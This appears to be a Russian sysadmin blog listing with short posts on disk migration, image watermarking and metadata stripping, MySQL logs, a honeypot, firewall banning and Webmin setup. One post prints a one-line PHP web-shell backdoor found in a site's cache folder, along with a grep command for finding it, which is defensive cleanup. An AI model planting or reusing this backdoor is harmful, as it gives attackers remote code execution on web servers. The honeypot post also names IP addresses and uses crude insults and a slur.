Перенос Linux с одного диска на другой Debian 10

Blog by Mikro
Для переноса системы с диска на новый диск или ССД диск потребуется сделать несколько шагов.
После подключения нового диска к старой системе Linux на примере старенькой Debian 10 требуется:
  • Разметить и форматировать новый диск.
  • Перенести данные вместе с ОС.
  • Перейти через chroot в папку c перенесённой ОС.
  • Поменять fstab.
  • Установить загрузчик Grub.
  • готово.

Читать дальше

Водные знаки для JPG в Linux

Blog by Mikro
Потребовалось нанести на JPG и PNG файлы ватермарки.
Массовый поиск и нанесение с помощью комманды

ls -1 *.jpg | xargs -I'{}' convert {}  -fill white -box '#00770080' -gravity South -pointsize 20 -annotate +0+5 'radio.obninskiy.net' {}

ls -1 *.png | xargs -I'{}' convert {}  -fill white -box '#00770080' -gravity South -pointsize 20 -annotate +0+5 'radio.obninskiy.net' {}


а также можно поиск и замена по всем папкам


cd /вашш путь
find -name "*.jpg" -print0 | xargs ну и так далее

Mysql логи mysql-bin.000

Blog by Mikro
В линуксе постоянно забываю о настройке самого главного параметра для MYSQL сервера
а именно автоматического удаления лог фалов иначе сервер просто забьёт свободное место и вклинит.

что надо сделать
Читать дальше

Наивные ХАКЕРЫ или Тролим БОТНЕТ WANNAMINE

ХАЦКЕРЫ
haker pidor
На накенец-то дошли руки до того чтобы посмотреть зачем хакерам доступ к терминалу SSH и Telnet.
Запускаем на серваке ФЭЙКОВЫЙ терминал cowrie, даём кулхакеру подобрать пароль напимер admin и пароль Qwerty!
Ржом!
Большинство уродБотНетов делают одно и тоже.
Входят,
62.93.166.91] login attempt [b'nproc'/b'nproc'] succeeded

Узнают тип процессора
62.93.166.91] executing command «b'cat /proc/cpuinfo | grep name | wc -l'»
62.93.166.91] Command found: cat /proc/cpuinfo

ну и уходят.

Но попался наконец-то кулхацкер… айпишник этого говноря 58.240.92.50! Ещё и китайский конечно же.

Читать дальше

массово удаляю метаданные JPG в Linux

WEB
JPG методанные Exif это

палево

. Значит отовсюду ищем и трём.
Ставим пакет ImageMagick
топаем в нужную папрку cd /home/srv например и бомбим
find -name "*.jpg" -print0 | xargs -0 mogrify -strip
или если это в одной папке и их мало
ls -1 *.jpg | xargs -0 mogrify -strip

И тоже самое для регистра JPG

Старая уязвимость assert(stripslashes

WEB
В старом движке Livestreet нашёл давнюю уязвимость которая откуда-то взялаь и очень давно лежала в папке cache.
Но какой-то злоумышленник умудрился ей воспользоваться!
Выглядит как обычный php файл с содержанием типа

<?php extract($_REQUEST) && @assert(stripslashes($not)) && exit;


для поиска остальных фалов с подобным кодом использую команду
grep -r "assert(stripslashes" /srv/www/


Кстати из-за этой уязвимости начали находиться ЭЛЬФЫ (ELF).
В памяти сидят то удаляем их и снимаем процесс

Простой bash скрипт блокировки ботнета, взлома ssh и перебор портов

WEB
Бесконечное количество хацкеров пытающихся получить доступ к серваку?
Ломится на сервак БОТНЕТ?

Что делать?

Первым делом менять стандартные порты управления, фтп сервера и тельнет(лучше не использовать вапще) например 22 на 6622 или 222 и так далее.
Запретить доступ к нужным Вам портам через фаервол, разрешить только с определённых известных Вам ip.
А всех остальных хацкеров банить!
Пример ламерского скрипта под OPENSUSE 42 который ждёт пакет на определённый порт, логирует, парсит, банит!
Собирает массив из 100 записей после перезапускает фаервол чтобы обнулить список. 100 можно поменять на 1000 но главное не переборщить.
В скрипте удалить ненужные порты или заменить!
ВАШи.АЙПИ.АДРЕСа.- поменять! Если он один то удалить!
Читать дальше

Установка webmin на opensuse 42.3 вручную.

WEB
Так как webmin наотрез отказаля устанавливаться на OPEnSUSE 42.3
rpm -i webmin-1.860-1.noarch.rpm
warning: webmin-1.860-1.noarch.rpm: Header V3 DSA/SHA1 Signature, key ID 11f63c51: NOKEY
error: Failed dependencies:
        perl(Encode::Detect) is needed by webmin-1.860-1.noarch

А потом другие ошибки типа версия линукс неизвестна и так далее. Вобщем собираем руками
из под рута выполняем
cd /tmp
wget http://prdownloads.sourceforge.net/webadmin/webmin-1.860.tar.gz

*новую версию пакета качайте, у меня на момент самая актуальная
tar -zxvf webmin-1.860.tar.gz
cd webmin-1.860
./setup.sh /usr/local/webmin


Спросит Config file directory [/etc/webmin]:
жмём энтер если ничего не хотите менять и так до того как спросит Login name
тут уж указывайте любой логин и задавайте пароль. лучше не связаный с рутом.
sss (y/n):y
statr ad boot...: y
Может спросить версию линукс и список, укажите каккая у вас.
Теперь в брандмауэр добавить порт 10000 на вход и заходим через узел:10000